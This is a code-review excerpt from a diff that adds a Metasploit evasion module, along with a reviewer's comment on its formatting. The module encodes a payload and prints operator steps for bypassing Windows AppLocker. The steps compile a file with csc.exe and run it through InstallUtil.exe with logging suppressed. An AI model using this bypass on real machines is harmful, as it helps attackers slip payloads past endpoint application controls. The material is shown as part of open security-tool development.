modules/evasion/windows/applocker_evasion_install_util.rb

```diff
@@ -0,0 +1,121 @@
+      },
+      'Author'      =>
+        [
+          'Nick Tyrer <@NickTyrer>', # module development
+          'Casey Smith',  # install_util bypass research
+        ],
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'win',
+      'Arch'        => [ ARCH_X86, ARCH_X64 ],
+      'Targets'     => [ ['Microsoft Windows', {}] ]
+    ))
+
+    register_options([
+      OptString.new('FILENAME', [true, 'Filename for the evasive file (default: install_util.txt)', 'install_util.txt'])
+    ])
+  end
+
+
+  def build_payload
+    esc = Rex::Text.encode_base64(payload.encoded)
+  end
+
+
+  def instructions
+    <<~HEREDOC
+
+        ___________________________________________________________________________________________________________________________________________
+       |                                                                                                                                           |
+       |                                                                Instructions                                                               |
+       |___________________________________________________________________________________________________________________________________________|
+       |                                                                                                                                           |
+       | 1.Copy #{datastore['FILENAME']} to the target and execute:                                                                                        |
+       | 2.x86{                                                                                                                                    |
+       |       Compile using: C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\csc.exe /out:installutil.exe #{datastore['FILENAME']}                          |
+       |       Execute using: C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\InstallUtil.exe /logfile= /LogToConsole=false /U installutil.exe       |
+       |      }                                                                                                                                    |
+       |  x64{                                                                                                                                     |
+       |      Compile using: C:\\Windows\\Microsoft.Net\\Framework64\\v4.0.30319\\csc.exe /out:installutil.exe #{datastore['FILENAME']}                         |
+       |      Execute using: C:\\Windows\\Microsoft.Net\\Framework64\\v4.0.30319\\InstallUtil.exe /logfile= /LogToConsole=false /U installutil.exe      |
+       |      }                                                                                                                                    |
+       |___________________________________________________________________________________________________________________________________________|
+    HEREDOC
+  end
```

Comment:
This... thing will definitely cause problems with smaller terminals and isn't generally used in MSF. Try simplifying the instructions (using just simple `print_status()` lines). Also, the paths for the executables are probably going to be different (b/c of the .NET versions), so I would leave those as a wildcard-esque path.